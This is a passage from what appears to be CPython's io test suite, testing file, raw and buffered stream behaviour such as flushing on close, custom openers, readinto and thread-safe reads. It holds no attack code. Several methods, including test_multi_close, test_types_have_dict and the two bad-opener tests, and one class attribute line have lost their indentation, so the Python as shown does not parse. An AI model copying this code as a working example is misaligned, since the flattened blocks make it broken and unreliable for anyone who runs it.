            self.skipTest("test requires at least 2 GiB of memory")
        with self.open(zero, "rb", buffering=0) as f:
            self.assertRaises(OverflowError, f.read)
        with self.open(zero, "rb") as f:
            self.assertRaises(OverflowError, f.read)
        with self.open(zero, "r") as f:
            self.assertRaises(OverflowError, f.read)
    def check_flush_error_on_close(self, *args, **kwargs):
        # Test that the file is closed despite failed flush
        # and that flush() is called before file closed.
        f = self.open(*args, **kwargs)
        closed = []
        def bad_flush():
            # Record the closed state at the moment flush() is invoked.
            closed[:] = [f.closed]
            raise OSError()
        f.flush = bad_flush
        self.assertRaises(OSError, f.close) # exception not swallowed
        self.assertTrue(f.closed)
        self.assertTrue(closed)      # flush() called
        self.assertFalse(closed[0])  # flush() called before file closed
        f.flush = lambda: None  # break reference loop
    def test_flush_error_on_close(self):
        # Run check_flush_error_on_close for every stream layer (raw,
        # buffered, text), opened both by name and by fd, with and
        # without closefd.
        # raw file
        # Issue #5700: io.FileIO calls flush() after file closed
        self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'wb', buffering=0)
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
        os.close(fd)
        # buffered io
        self.check_flush_error_on_close(support.TESTFN, 'wb')
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'wb')
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'wb', closefd=False)
        os.close(fd)
        # text io
        self.check_flush_error_on_close(support.TESTFN, 'w')
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'w')
        fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
        self.check_flush_error_on_close(fd, 'w', closefd=False)
        os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
    def test_RawIOBase_read(self):
        # Exercise the default limited RawIOBase.read(n) implementation (which
        # calls readinto() internally).
        # None entries in the mock simulate "no data available"
        # (non-blocking); read() must pass them through as None.
        rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
        self.assertEqual(rawio.read(2), b"ab")
        self.assertEqual(rawio.read(2), b"c")
        self.assertEqual(rawio.read(2), b"d")
        self.assertEqual(rawio.read(2), None)
        self.assertEqual(rawio.read(2), b"ef")
        self.assertEqual(rawio.read(2), b"g")
        self.assertEqual(rawio.read(2), None)
        self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
    def test_opener(self):
        # A custom opener callback may return an already-open fd; the path
        # argument ("non-existent") is then never touched.
        with self.open(support.TESTFN, "w") as f:
            f.write("egg\n")
        fd = os.open(support.TESTFN, os.O_RDONLY)
        def opener(path, flags):
            return fd
        with self.open("non-existent", "r", opener=opener) as f:
            self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
    def test_fileio_closefd(self):
        # Issue #4841
        # Re-running FileIO.__init__ on a live object must not close the
        # previously-wrapped fd, and close() with closefd=False must leave
        # the underlying fd usable.
        with self.open(__file__, 'rb') as f1, \
             self.open(__file__, 'rb') as f2:
            fileio = self.FileIO(f1.fileno(), closefd=False)
            # .__init__() must not close f1
            fileio.__init__(f2.fileno(), closefd=False)
            f1.readline()
            # .close() must not close f2
            fileio.close()
            f2.readline()
    def test_nonbuffered_textio(self):
        # Text mode with buffering=0 is invalid; it must raise ValueError
        # without leaking a half-constructed file (no ResourceWarning).
        with support.check_no_resource_warning(self):
            with self.assertRaises(ValueError):
                self.open(support.TESTFN, 'w', buffering=0)
    def test_invalid_newline(self):
        # An unrecognized newline argument must raise ValueError without
        # leaking a half-constructed file (no ResourceWarning).
        with support.check_no_resource_warning(self):
            with self.assertRaises(ValueError):
                self.open(support.TESTFN, 'w', newline='invalid')
    def test_buffered_readinto_mixin(self):
        # Test the implementation provided by BufferedIOBase
        # readinto()/readinto1() must delegate to read()/read1() and copy
        # the result into the caller-supplied buffer.
        class Stream(self.BufferedIOBase):
            def read(self, size):
                return b"12345"
            read1 = read
        stream = Stream()
        for method in ("readinto", "readinto1"):
            with self.subTest(method):
                buffer = byteslike(5)
                self.assertEqual(getattr(stream, method)(buffer), 5)
                self.assertEqual(bytes(buffer), b"12345")
    def test_fspath_support(self):
        # open() must accept os.PathLike objects whose __fspath__ returns
        # str or bytes; anything else (int, None, odd classes) must raise
        # TypeError, and exceptions from __fspath__ must propagate.
        def check_path_succeeds(path):
            with self.open(path, "w") as f:
                f.write("egg\n")
            with self.open(path, "r") as f:
                self.assertEqual(f.read(), "egg\n")
        check_path_succeeds(FakePath(support.TESTFN))
        check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
        with self.open(support.TESTFN, "w") as f:
            bad_path = FakePath(f.fileno())
            with self.assertRaises(TypeError):
                self.open(bad_path, 'w')
        bad_path = FakePath(None)
        with self.assertRaises(TypeError):
            self.open(bad_path, 'w')
        bad_path = FakePath(FloatingPointError)
        with self.assertRaises(FloatingPointError):
            self.open(bad_path, 'w')
        # ensure that refcounting is correct with some error conditions
        with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
            self.open(FakePath(support.TESTFN), 'rwxa')
    def test_RawIOBase_readall(self):
        # Exercise the default unlimited RawIOBase.read() and readall()
        # implementations.
        rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
        self.assertEqual(rawio.read(), b"abcdefg")
        rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
        self.assertEqual(rawio.readall(), b"abcdefg")
    def test_BufferedIOBase_readinto(self):
        # Exercise the default BufferedIOBase.readinto() and readinto1()
        # implementations (which call read() or read1() internally).
        class Reader(self.BufferedIOBase):
            def __init__(self, avail):
                # Remaining bytes this reader can serve.
                self.avail = avail
            def read(self, size):
                result = self.avail[:size]
                self.avail = self.avail[size:]
                return result
            def read1(self, size):
                """Returns no more than 5 bytes at once"""
                return self.read(min(size, 5))
        tests = (
            # (test method, total data available, read buffer size, expected
            #  read size)
            ("readinto", 10, 5, 5),
            ("readinto", 10, 6, 6),  # More than read1() can return
            ("readinto", 5, 6, 5),  # Buffer larger than total available
            ("readinto", 6, 7, 6),
            ("readinto", 10, 0, 0),  # Empty buffer
            ("readinto1", 10, 5, 5),  # Result limited to single read1() call
            ("readinto1", 10, 6, 5),  # Buffer larger than read1() can return
            ("readinto1", 5, 6, 5),  # Buffer larger than total available
            ("readinto1", 6, 7, 5),
            ("readinto1", 10, 0, 0),  # Empty buffer
        )
        # Sentinel byte used to prove untouched buffer tail is preserved.
        UNUSED_BYTE = 0x81
        for test in tests:
            with self.subTest(test):
                method, avail, request, result = test
                reader = Reader(bytes(range(avail)))
                buffer = bytearray((UNUSED_BYTE,) * request)
                method = getattr(reader, method)
                self.assertEqual(method(buffer), result)
                self.assertEqual(len(buffer), request)
                self.assertSequenceEqual(buffer[:result], range(result))
                unused = (UNUSED_BYTE,) * (request - result)
                self.assertSequenceEqual(buffer[result:], unused)
                self.assertEqual(len(reader.avail), avail - result)
    def test_close_assert(self):
        # close() must survive an object whose __setattr__ is a no-op and
        # whose flush() raises — this combination used to trip an internal
        # assertion.
        class R(self.IOBase):
            def __setattr__(self, name, value):
                pass
            def flush(self):
                raise OSError()
        f = R()
        # This would cause an assertion failure.
        self.assertRaises(OSError, f.close)
        # Silence destructor error
        R.flush = lambda self: None
class CIOTest(IOTest):
    # Runs the IOTest suite against the C implementation (io), plus
    # C-specific regression tests.

    def test_IOBase_finalize(self):
        # Issue #12149: segmentation fault on _PyIOBase_finalize when both a
        # class which inherits IOBase and an object of this class are caught
        # in a reference cycle and close() is already in the method cache.
        class MyIO(self.IOBase):
            def close(self):
                pass

        # create an instance to populate the method cache
        MyIO()
        obj = MyIO()
        obj.obj = obj
        wr = weakref.ref(obj)
        del MyIO
        del obj
        support.gc_collect()
        self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
    # Runs the IOTest suite against the pure-Python implementation (_pyio);
    # the io/pyio binding happens in the module's test setup machinery.
    pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
    # Verifies that the C (io) and pure-Python (_pyio) RawIOBase classes
    # expose exactly the same public API, in both directions.

    def test_RawIOBase_io_in_pyio_match(self):
        """Test that pyio RawIOBase class has all c RawIOBase methods"""
        mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
                                               ignore=('__weakref__',))
        self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')

    def test_RawIOBase_pyio_in_io_match(self):
        """Test that c RawIOBase class has all pyio RawIOBase methods"""
        mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
        self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
    # Tests common to BufferedReader, BufferedWriter and BufferedRandom
    # Mixed into concrete test classes that define self.tp (the buffered
    # type under test) and the Mock*IO helpers.

    def test_detach(self):
        # detach() returns the raw stream exactly once; a second call
        # fails, but repr() must keep working on the detached object.
        raw = self.MockRawIO()
        buf = self.tp(raw)
        self.assertIs(buf.detach(), raw)
        self.assertRaises(ValueError, buf.detach)
        repr(buf)  # Should still work

    def test_fileno(self):
        # fileno() is forwarded to the raw object (MockRawIO reports 42).
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        self.assertEqual(42, bufio.fileno())

    def test_invalid_args(self):
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        # Invalid whence
        self.assertRaises(ValueError, bufio.seek, 0, -1)
        self.assertRaises(ValueError, bufio.seek, 0, 9)

    def test_override_destructor(self):
        # Destroying a subclass must call __del__, close(), flush() in
        # that order (recorded as [1, 2, 3]).
        tp = self.tp
        record = []
        class MyBufferedIO(tp):
            def __del__(self):
                record.append(1)
                try:
                    f = super().__del__
                except AttributeError:
                    pass
                else:
                    f()
            def close(self):
                record.append(2)
                super().close()
            def flush(self):
                record.append(3)
                super().flush()
        rawio = self.MockRawIO()
        bufio = MyBufferedIO(rawio)
        del bufio
        support.gc_collect()
        self.assertEqual(record, [1, 2, 3])

    def test_context_manager(self):
        # Test usability as a context manager
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        def _with():
            with bufio:
                pass
        _with()
        # bufio should now be closed, and using it a second time should raise
        # a ValueError.
        self.assertRaises(ValueError, _with)

    def test_error_through_destructor(self):
        # Test that the exception state is not modified by a destructor,
        # even if close() fails.
        rawio = self.CloseFailureIO()
        with support.catch_unraisable_exception() as cm:
            with self.assertRaises(AttributeError):
                self.tp(rawio).xyzzy

            if not IOBASE_EMITS_UNRAISABLE:
                self.assertIsNone(cm.unraisable)
            elif cm.unraisable is not None:
                self.assertEqual(cm.unraisable.exc_type, OSError)

    def test_repr(self):
        # repr() must include the raw object's name attribute when present,
        # for both str and bytes names.
        raw = self.MockRawIO()
        b = self.tp(raw)
        clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
        self.assertRegex(repr(b), "<%s>" % clsname)
        raw.name = "dummy"
        self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
        raw.name = b"dummy"
        self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)

    def test_recursive_repr(self):
        # Issue #25455
        # A name attribute that points back at the buffered object itself
        # must not cause infinite recursion in repr().
        raw = self.MockRawIO()
        b = self.tp(raw)
        with support.swap_attr(raw, 'name', b):
            try:
                repr(b)  # Should not crash
            except RuntimeError:
                pass

    def test_flush_error_on_close(self):
        # Test that buffered file is closed despite failed flush
        # and that flush() is called before file closed.
        raw = self.MockRawIO()
        closed = []
        def bad_flush():
            # Record both layers' closed state at flush() time.
            closed[:] = [b.closed, raw.closed]
            raise OSError()
        raw.flush = bad_flush
        b = self.tp(raw)
        self.assertRaises(OSError, b.close) # exception not swallowed
        self.assertTrue(b.closed)
        self.assertTrue(raw.closed)
        self.assertTrue(closed)      # flush() called
        self.assertFalse(closed[0])  # flush() called before file closed
        self.assertFalse(closed[1])
        raw.flush = lambda: None  # break reference loop

    def test_close_error_on_close(self):
        # When both flush() and close() raise, close() must propagate the
        # close error with the flush error chained as __context__.
        raw = self.MockRawIO()
        def bad_flush():
            raise OSError('flush')
        def bad_close():
            raise OSError('close')
        raw.close = bad_close
        b = self.tp(raw)
        b.flush = bad_flush
        with self.assertRaises(OSError) as err: # exception not swallowed
            b.close()
        self.assertEqual(err.exception.args, ('close',))
        self.assertIsInstance(err.exception.__context__, OSError)
        self.assertEqual(err.exception.__context__.args, ('flush',))
        self.assertFalse(b.closed)
        # Silence destructor error
        raw.close = lambda: None
        b.flush = lambda: None

    def test_nonnormalized_close_error_on_close(self):
        # Issue #21677
        # Same as above with not-yet-normalized exceptions (NameError
        # raised from inside the helpers).
        raw = self.MockRawIO()
        def bad_flush():
            raise non_existing_flush
        def bad_close():
            raise non_existing_close
        raw.close = bad_close
        b = self.tp(raw)
        b.flush = bad_flush
        with self.assertRaises(NameError) as err: # exception not swallowed
            b.close()
        self.assertIn('non_existing_close', str(err.exception))
        self.assertIsInstance(err.exception.__context__, NameError)
        self.assertIn('non_existing_flush', str(err.exception.__context__))
        self.assertFalse(b.closed)
        # Silence destructor error
        b.flush = lambda: None
        raw.close = lambda: None

    def test_multi_close(self):
        # close() is idempotent; flush() after close raises ValueError.
        raw = self.MockRawIO()
        b = self.tp(raw)
        b.close()
        b.close()
        b.close()
        self.assertRaises(ValueError, b.flush)

    def test_unseekable(self):
        # tell()/seek() on an unseekable raw stream must raise
        # UnsupportedOperation.
        bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
        self.assertRaises(self.UnsupportedOperation, bufio.tell)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)

    def test_readonly_attributes(self):
        # The .raw attribute is read-only after construction.
        raw = self.MockRawIO()
        buf = self.tp(raw)
        x = self.MockRawIO()
        with self.assertRaises(AttributeError):
            buf.raw = x
class SizeofTest:
    # Mixin: sys.getsizeof() accounting for buffered objects. Requires the
    # concrete test class to supply self.tp and self.MockRawIO.

    @support.cpython_only
    def test_sizeof(self):
        # Two buffered objects differing only in buffer_size must differ
        # in reported size by exactly the buffer-size delta.
        bufsize1 = 4096
        bufsize2 = 8192
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize1)
        size = sys.getsizeof(bufio) - bufsize1
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize2)
        self.assertEqual(sys.getsizeof(bufio), size + bufsize2)

    @support.cpython_only
    def test_buffer_freeing(self):
        # PEP 8 fix: removed stray space before the colon in the original
        # "def test_buffer_freeing(self) :".
        # Closing the buffered object must free its internal buffer,
        # shrinking the reported size back by buffer_size.
        bufsize = 4096
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize)
        size = sys.getsizeof(bufio) - bufsize
        bufio.close()
        self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
    # Behavioral tests for the BufferedReader type; concrete subclasses
    # bind self.tp to io.BufferedReader or pyio.BufferedReader.
    read_mode = "rb"

    def test_constructor(self):
        # __init__ may be called repeatedly to re-bind the raw stream;
        # non-positive buffer sizes are rejected.
        rawio = self.MockRawIO([b"abc"])
        bufio = self.tp(rawio)
        bufio.__init__(rawio)
        bufio.__init__(rawio, buffer_size=1024)
        bufio.__init__(rawio, buffer_size=16)
        self.assertEqual(b"abc", bufio.read())
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        rawio = self.MockRawIO([b"abc"])
        bufio.__init__(rawio)
        self.assertEqual(b"abc", bufio.read())

    def test_uninitialized(self):
        # An instance created via __new__ (no __init__) must fail cleanly
        # on use, then work after a real __init__.
        bufio = self.tp.__new__(self.tp)
        del bufio
        bufio = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               bufio.read, 0)
        bufio.__init__(self.MockRawIO())
        self.assertEqual(bufio.read(0), b'')

    def test_read(self):
        # read(None) and read(n) both drain the raw chunks; negative
        # sizes other than -1 are rejected.
        for arg in (None, 7):
            rawio = self.MockRawIO((b"abc", b"d", b"efg"))
            bufio = self.tp(rawio)
            self.assertEqual(b"abcdefg", bufio.read(arg))
        # Invalid args
        self.assertRaises(ValueError, bufio.read, -2)

    def test_read1(self):
        # read1() performs at most one raw read; the _reads counter on the
        # mock pins down exactly when raw reads happen.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"a", bufio.read(1))
        self.assertEqual(b"b", bufio.read1(1))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"", bufio.read1(0))
        self.assertEqual(b"c", bufio.read1(100))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"d", bufio.read1(100))
        self.assertEqual(rawio._reads, 2)
        self.assertEqual(b"efg", bufio.read1(100))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1(100))
        self.assertEqual(rawio._reads, 4)

    def test_read1_arbitrary(self):
        # read1() with no size or -1 returns whatever the buffer/next raw
        # read yields.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"a", bufio.read(1))
        self.assertEqual(b"bc", bufio.read1())
        self.assertEqual(b"d", bufio.read1())
        self.assertEqual(b"efg", bufio.read1(-1))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1())
        self.assertEqual(rawio._reads, 4)

    def test_readinto(self):
        # readinto() fills the caller's buffer across raw chunk
        # boundaries; a short final read leaves the buffer tail untouched,
        # and a None raw result stops the fill.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        b = bytearray(2)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"cd")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ef")
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"gf")
        self.assertEqual(bufio.readinto(b), 0)
        self.assertEqual(b, b"gf")
        rawio = self.MockRawIO((b"abc", None))
        bufio = self.tp(rawio)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"cb")

    def test_readinto1(self):
        # readinto1() performs at most one raw read, but may drain the
        # internal buffer first; _reads pins down the raw-read count.
        buffer_size = 10
        rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
        bufio = self.tp(rawio, buffer_size=buffer_size)
        b = bytearray(2)
        self.assertEqual(bufio.peek(3), b'abc')
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 1)
        self.assertEqual(b[:1], b"c")
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(bufio.readinto1(b), 2)
        self.assertEqual(b, b"de")
        self.assertEqual(rawio._reads, 2)
        b = bytearray(2*buffer_size)
        self.assertEqual(bufio.peek(3), b'fgh')
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(bufio.readinto1(b), 6)
        self.assertEqual(b[:6], b"fghjkl")
        self.assertEqual(rawio._reads, 4)

    def test_readinto_array(self):
        buffer_size = 60
        data = b"a" * 26
        rawio = self.MockRawIO((data,))
        bufio = self.tp(rawio, buffer_size=buffer_size)

        # Create an array with element size > 1 byte
        b = array.array('i', b'x' * 32)
        assert len(b) != 16

        # Read into it. We should get as many *bytes* as we can fit into b
        # (which is more than the number of elements)
        n = bufio.readinto(b)
        self.assertGreater(n, len(b))

        # Check that old contents of b are preserved
        bm = memoryview(b).cast('B')
        self.assertLess(n, len(bm))
        self.assertEqual(bm[:n], data[:n])
        self.assertEqual(bm[n:], b'x' * (len(bm[n:])))

    def test_readinto1_array(self):
        buffer_size = 60
        data = b"a" * 26
        rawio = self.MockRawIO((data,))
        bufio = self.tp(rawio, buffer_size=buffer_size)

        # Create an array with element size > 1 byte
        b = array.array('i', b'x' * 32)
        assert len(b) != 16

        # Read into it. We should get as many *bytes* as we can fit into b
        # (which is more than the number of elements)
        n = bufio.readinto1(b)
        self.assertGreater(n, len(b))

        # Check that old contents of b are preserved
        bm = memoryview(b).cast('B')
        self.assertLess(n, len(bm))
        self.assertEqual(bm[:n], data[:n])
        self.assertEqual(bm[n:], b'x' * (len(bm[n:])))

    def test_readlines(self):
        # readlines() with a hint stops after the hint is reached;
        # None means no hint.
        def bufio():
            rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
            return self.tp(rawio)
        self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
        self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
        self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])

    def test_buffering(self):
        # For each (buffer size, sequence of buffered reads), check both
        # the data returned and the sizes of the underlying raw reads.
        data = b"abcdefghi"
        dlen = len(data)

        tests = [
            [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
            [ 100, [ 3, 3, 3],     [ dlen ]    ],
            [   4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
        ]

        for bufsize, buf_read_sizes, raw_read_sizes in tests:
            rawio = self.MockFileIO(data)
            bufio = self.tp(rawio, buffer_size=bufsize)
            pos = 0
            for nbytes in buf_read_sizes:
                self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
                pos += nbytes
            # this is mildly implementation-dependent
            self.assertEqual(rawio.read_history, raw_read_sizes)

    def test_read_non_blocking(self):
        # Inject some None's in there to simulate EWOULDBLOCK
        rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcd", bufio.read(6))
        self.assertEqual(b"e", bufio.read(1))
        self.assertEqual(b"fg", bufio.read())
        self.assertEqual(b"", bufio.peek(1))
        self.assertIsNone(bufio.read())
        self.assertEqual(b"", bufio.read())

        rawio = self.MockRawIO((b"a", None, None))
        self.assertEqual(b"a", rawio.readall())
        self.assertIsNone(rawio.readall())

    def test_read_past_eof(self):
        # Asking for more than is available returns everything, no error.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read(9000))

    def test_read_all(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read())

    @support.requires_resource('cpu')
    def test_threads(self):
        try:
            # Write out many bytes with exactly the same number of 0's,
            # 1's... 255's. This will help us check that concurrent reading
            # doesn't duplicate or forget contents.
            N = 1000
            l = list(range(256)) * N
            random.shuffle(l)
            s = bytes(bytearray(l))
            with self.open(support.TESTFN, "wb") as f:
                f.write(s)
            with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
                bufio = self.tp(raw, 8)
                errors = []
                results = []
                def f():
                    try:
                        # Intra-buffer read then buffer-flushing read
                        for n in cycle([1, 19]):
                            s = bufio.read(n)
                            if not s:
                                break
                            # list.append() is atomic
                            results.append(s)
                    except Exception as e:
                        errors.append(e)
                        raise
                threads = [threading.Thread(target=f) for x in range(20)]
                with support.start_threads(threads):
                    time.sleep(0.02) # yield
                self.assertFalse(errors,
                    "the following exceptions were caught: %r" % errors)
                s = b''.join(results)
                for i in range(256):
                    c = bytes(bytearray([i]))
                    self.assertEqual(s.count(c), N)
        finally:
            support.unlink(support.TESTFN)

    def test_unseekable(self):
        # Unlike the common version, also check that tell()/seek() keep
        # failing after a read has populated the buffer.
        bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
        self.assertRaises(self.UnsupportedOperation, bufio.tell)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
        bufio.read(1)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
        self.assertRaises(self.UnsupportedOperation, bufio.tell)

    def test_misbehaved_io(self):
        # A raw object whose seek/tell lie must surface OSError.
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertRaises(OSError, bufio.seek, 0)
        self.assertRaises(OSError, bufio.tell)

        # Silence destructor error
        bufio.close = lambda: None

    def test_no_extraneous_read(self):
        # Issue #9550; when the raw IO object has satisfied the read request,
        # we should not issue any additional reads, otherwise it may block
        # (e.g. socket).
        bufsize = 16
        for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
            rawio = self.MockRawIO([b"x" * n])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            # Simple case: one raw read is enough to satisfy the request.
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))
            # A more complex case where two raw reads are needed to satisfy
            # the request.
            rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
            bufio = self.tp(rawio, bufsize)
            self.assertEqual(bufio.read(n), b"x" * n)
            self.assertEqual(rawio._extraneous_reads, 0,
                             "failed for {}: {} != 0".format(n, rawio._extraneous_reads))

    def test_read_on_closed(self):
        # Issue #23796
        # peek()/read1() on a closed reader must raise ValueError.
        b = io.BufferedReader(io.BytesIO(b"12"))
        b.read(1)
        b.close()
        self.assertRaises(ValueError, b.peek)
        self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
    # C-implementation-specific BufferedReader tests.
    tp = io.BufferedReader

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        # Each failed re-__init__ leaves the object unusable: read() must
        # raise ValueError afterwards.
        rawio = self.MockRawIO([b"abc"])
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.read)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.read)

    def test_misbehaved_io_read(self):
        rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading different, so that
        # checking this is not so easy.
        self.assertRaises(OSError, bufio.read, 10)

    def test_garbage_collection(self):
        # C BufferedReader objects are collected.
        # The Python version has __del__, so it ends into gc.garbage instead
        self.addCleanup(support.unlink, support.TESTFN)
        with support.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(support.TESTFN, "w+b")
            f = self.tp(rawio)
            f.f = f
            wr = weakref.ref(f)
            del f
            support.gc_collect()
        self.assertIsNone(wr(), wr)

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedReader"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
    # Runs BufferedReaderTest against the pure-Python implementation.
    tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
    def test_constructor(self):
        # __init__ may be called repeatedly to re-bind the raw stream;
        # non-positive buffer sizes are rejected; writes after a valid
        # re-init still reach the raw write stack.
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        bufio.__init__(rawio)
        bufio.__init__(rawio, buffer_size=1024)
        bufio.__init__(rawio, buffer_size=16)
        self.assertEqual(3, bufio.write(b"abc"))
        bufio.flush()
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        bufio.__init__(rawio)
        self.assertEqual(3, bufio.write(b"ghi"))
        bufio.flush()
        self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
    def test_uninitialized(self):
        # An instance created via __new__ (no __init__) must fail cleanly
        # on write(), then work after a real __init__.
        bufio = self.tp.__new__(self.tp)
        del bufio
        bufio = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               bufio.write, b'')
        bufio.__init__(self.MockRawIO())
        self.assertEqual(bufio.write(b''), 0)
    def test_detach_flush(self):
        # detach() must flush pending buffered data to the raw stream.
        raw = self.MockRawIO()
